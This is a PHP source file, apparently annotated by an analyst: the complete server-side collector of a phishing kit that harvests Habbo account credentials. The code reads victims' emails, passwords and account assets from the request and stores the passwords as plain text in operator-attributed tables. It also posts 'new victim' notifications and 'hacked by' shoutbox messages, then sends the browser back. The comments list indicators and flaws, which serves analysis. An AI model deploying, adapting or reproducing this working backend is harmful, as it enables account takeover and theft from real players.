- <?php
- // Analyst notes: server-side collection endpoint of a credential-harvesting kit.
- // The runtime strings below ('Você tem uma nova vitima!', 'foi hackeado por') and the
- // 'pass' / 'email' request fields show it stores submitted Habbo account data per operator.
- // Indicators visible in this file: the request parameter names read from $_REQUEST, the
- // tables acesso / users / habbos / habbos_bkp / notification / shoutbox, and the mail
- // sender frank@project-xhabbo.com with subject "AGRADECIMENTOS XHABBO".
- // $connect and num_rows() are not defined here; presumably they come from the include
- // below -- confirm against login/includes/connect_db.php.
- include 'login/includes/connect_db.php';
- // Sender address: the Client-IP header first, then X-Forwarded-For, then REMOTE_ADDR.
- // The first two are request headers, so the value used for the ban check (and the ip
- // stored later) is whatever the client or a proxy sent; treat it as unverified evidence.
- if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $ip = $_SERVER['REMOTE_ADDR'];}
- // Ban gate: more than 2 rows in `acesso` for this address ends the request with the body
- // "Banned". The header() call follows the echo, so the 500 status and X-Error-Message
- // header may not reach the client unless output buffering is enabled -- confirm.
- if(num_rows("","","acesso"," WHERE ip='$ip'")>2) {
- echo "Banned";
- header('X-Error-Message: Incorrect username or password', true, 500);
- die;
- } else {
- ########################### METHOD ########################
- // Constant label written to the `metodo` column of every record inserted below.
- $metodo = "add";
- ######################### SCRIPT DUMP #######################
- // Every field is read from $_REQUEST (GET or POST, and cookies depending on configuration),
- // so submitted values can also appear in web-server access logs as query strings.
- // Each value passes through addslashes() and then htmlspecialchars() before use.
- $diamantes_scape = htmlspecialchars(addslashes($_REQUEST["diamantes"])); //diamond count
- $compras = htmlspecialchars(addslashes($_REQUEST["compras"])); //purchase history
- $moedas_scape = htmlspecialchars(addslashes($_REQUEST["moedas"])); //coin count
- $emblemac = htmlspecialchars(addslashes($_REQUEST['emblemac'])); //has HC badge
- $mobis = htmlspecialchars(addslashes($_REQUEST['mobis'])); //has mobis badge
- $verificado = htmlspecialchars(addslashes($_REQUEST['verificado'])); //account verified
- $desde = htmlspecialchars(addslashes($_REQUEST['since']));
- $since = substr($desde,0,10); //creation date
- $email = htmlspecialchars(addslashes($_REQUEST['email'])); //email
- $mail_add = htmlspecialchars(addslashes($_REQUEST['mail_add'])); //added email
- $pass = htmlspecialchars(addslashes($_REQUEST['pass'])); //password
- $habbo = htmlspecialchars(addslashes($_REQUEST['habbo'])); //habbo name
- // The `id` parameter arrives base64-encoded and is decoded to the operator key that is
- // looked up in `users`.
- $user= htmlspecialchars(addslashes(base64_decode($_REQUEST['id']))); //project user key
- $origin = htmlspecialchars(addslashes($_REQUEST['origin']));
- $premium = htmlspecialchars(addslashes($_REQUEST['premium']));
- $vip = substr($premium,0,-1); //has HC days
- $origem = substr($origin, 0, 25); //execution URL
- ########################### SERVER ACTIONS #########################
- // Same header-first address selection as at the top of the script; this copy is the one
- // written to the database.
- if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $pegar_ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $pegar_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $pegar_ip = $_SERVER['REMOTE_ADDR'];}//ip
- $dia_visita = $since;//habbo creation date
- // Timestamps come from date(), i.e. the server's configured timezone, in d-m-Y / H:i:s form.
- $dia_acesso = date("d-m-Y");
- $horas_visita = date("H:i:s");//time the data was sent to the project
- $url = htmlspecialchars(addslashes($origem));//URL that ran the script
- ########################### HABBO SERVER VARIABLES ###########################
- $br = ".com.br";
- $it = ".it";
- $es = ".es";
- $fr = ".fr";
- $nl = ".nl";
- $tk = ".com.tr";
- $eua = ".com";
- ########################## DETERMINE WHICH SERVER ##########################
- // Maps the submitted origin (first 25 characters) to a hotel URL by substring match;
- // the result is stored in the `servidor` column.
- if (strpos($url,$br)){
- $servidor = "http://www.habbo.com.br/"; //IF .com.br IS IN THE URL, THE SERVER WILL BE $BR
- }else if(strpos($url,$it)){
- $servidor = "http://www.habbo.it/";
- }else if(strpos($url,$es)){
- $servidor = "http://www.habbo.es/";
- }else if(strpos($url,$fr)){
- $servidor = "http://www.habbo.fr/";
- }else if(strpos($url,$nl)){
- $servidor = "http://www.habbo.nl/";
- }else if(strpos($url,$tk)){
- $servidor = "http://www.habbo..com.tr/";
- } else if(strpos($url,$eua)){
- $servidor = "http://www.habbo.com/";
- } else {
- $servidor = "Não identificado"; //IF NO HABBO VARIABLE IS PRESENT IN THE URL, IT IS NOT IDENTIFIED
- }
- ########################## PROTECTING AGAINST SQL #############################
- // Second addslashes() pass over values already escaped above, so stored strings are
- // backslash-escaped and HTML-entity-encoded forms, not the exact submitted bytes.
- // NOTE(review): every query below is built by string interpolation; addslashes() is not
- // equivalent to prepared statements.
- $email_scape = addslashes($email);
- $mail_add_scape = addslashes($mail_add);
- $pass_scape = addslashes($pass);
- $habbo_scape = addslashes($habbo);
- $user_scape = addslashes($user);
- $pegar_ip_scape = addslashes($pegar_ip);
- $dia_visita_scape = addslashes($dia_visita);
- $dia_acesso_scape = addslashes($dia_acesso);
- $horas_visita_scape = addslashes($horas_visita);
- $vip_scape = addslashes($vip);
- /*****************************************************************************************************************/
- //echo num_rows("","","users"," WHERE user = '$user_scape'");
- // Operator lookup: when the decoded key matches no row in `users`, the record is
- // attributed to the fallback account "Frank".
- $resultado = mysqli_query($connect,"SELECT * FROM `users` WHERE `user`='$user_scape'");
- $num_usu = mysqli_num_rows($resultado);
- if($num_usu > 0){
- } else {
- $user_scape = "Frank";
- }
- // Per-address cap: records are accepted only while `habbos` holds fewer than 10 rows for
- // this address; otherwise the final else branch adds a row to `acesso`, the table the
- // ban gate at the top counts.
- if(num_rows("","","habbos"," WHERE ip='$pegar_ip_scape'")<10) {
- if(num_rows("","","users"," WHERE user = '$user_scape'") > 0) {
- // New operator/habbo pair: increment the operator's `qtd` counter, queue a notification,
- // and write the submitted record to `habbos` and `habbos_bkp` (password stored as text).
- if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")<1) {
- while($row = mysqli_fetch_array($resultado)) {
- $qtd = $row["qtd"];
- $new_qtd = $qtd + 1;
- mysqli_query($connect,"UPDATE `users` SET `qtd`='$new_qtd' WHERE `user`='$user_scape'");
- }
- mysqli_query($connect,"INSERT INTO notification(user,notification)VALUES('$user_scape','Você tem uma nova vitima!') ");
- mysqli_query($connect,"INSERT INTO habbos(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verify_mail,metodo,moedas,diamantes,deletado,dia_visita,cookies,view,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('0'),('$compras'))");
- mysqli_query($connect,"INSERT INTO habbos_bkp(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verificado,metodo,moedas,diamantes,deletado,dia_visita,cookies,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('$compras'))");
- $data = date("d/m H:i");
- // When the connection reports no error, an HTML announcement naming the habbo and the
- // operator is written to `shoutbox`, and mail() sends a message to the submitted e-mail
- // address from frank@project-xhabbo.com.
- if(mysqli_connect_errno() == 0){
- mysqli_query($connect,"INSERT INTO shoutbox(message)VALUES('<div class=\"message\" style=\"background-color: rgba(33,150,243,0.12);\"><p>Frank<span style=\"font-size:11px;font-weight:normal;color:#676767; float:right;\">$data</span></p><p><span style=\"font-weight:Bold;\">$habbo_scape</span> foi hackeado por <span style=\"font-weight:Bold;\">$user_scape</span> pelo método <span style=\"font-weight:Bold;\">e-mail add</span>!<span style=\"font-size:11px;font-weight:bold;color:#8A1B08; float:right;\">BOT</span></p></div>') ");
- mail("$email_scape","AGRADECIMENTOS XHABBO","Obrigado por utilizar o https://project-xhabbo.com","From: frank@project-xhabbo.com");
- }
- }
- // Existing operator/habbo pair: only the stored record is updated, no new row is added.
- else if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")>0) {
- mysqli_query($connect,"UPDATE habbos SET mail_add=('$mail_add_scape') WHERE habbo = ('$habbo_scape') AND pass = ('$pass_scape') AND user = ('$user_scape')");//IF IT ALREADY EXISTS, ONLY UPDATE THE ADDED EMAIL
- mysqli_query($connect,"UPDATE habbos_bkp SET mail_add=('$mail_add_scape') AND dia_visita=('$dia_acesso_scape') AND pass = ('$pass_scape') AND user = ('$user_scape') WHERE habbo = ('$habbo_scape')");//IF IT ALREADY EXISTS, ONLY UPDATE THE ADDED EMAIL
- }
- }
- } else {
- mysqli_query($connect,"INSERT INTO `acesso` (`ip`) VALUES ('$pegar_ip_scape')");
- }
- }
- // Response on every path that did not die above: the static page that follows, titled
- // "Habbo Hotel", whose only script calls window.history.back().
- ?>
- <!DOCTYPE html>
- <html ng-app="app" lang="fr" debug="true">
- <head>
- <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
- <title>Habbo Hotel</title>
- <link rel="shortcut icon" href="https://habboo-a.akamaihd.net/habbo-web/america/pt/assets/images/favicon.08c747be.ico">
- <style type="text/css">
- body{
- background:linear-gradient(135deg,#15507c,#0c3a65);
- }
- </style>
- </head>
- <body>
- <script>window.history.back();</script>
- </body>
- </html>